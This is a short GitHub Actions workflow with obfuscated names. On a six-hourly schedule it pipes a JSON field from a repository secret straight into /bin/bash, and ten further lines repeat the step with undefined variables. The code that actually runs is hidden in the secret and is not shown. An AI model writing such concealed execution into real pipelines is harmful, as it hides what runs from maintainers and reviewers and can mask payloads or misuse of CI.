name: wangyinzi1234

on:
  workflow_dispatch:
  schedule:
    - cron: '47 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangyinzi1234
        env:
          gymn9: ${{ secrets.gymn9 }}
        run: |
          echo $gymn9 | jq -r .bxuu945 | /bin/bash
          echo $hnc4744 | jq -r .qu4 | /bin/bash
          echo $c85 | jq -r .okkk3 | /bin/bash
          echo $znb16 | jq -r .b8 | /bin/bash
          echo $xs9662 | jq -r .cb2 | /bin/bash
          echo $a27272 | jq -r .l9 | /bin/bash
          echo $ugvjn8 | jq -r .rnp77 | /bin/bash
          echo $scltx1 | jq -r .k708 | /bin/bash
          echo $tdccb86 | jq -r .acy198 | /bin/bash
          echo $ab3 | jq -r .vu07992 | /bin/bash
          echo $rqu2461 | jq -r .ql5 | /bin/bash

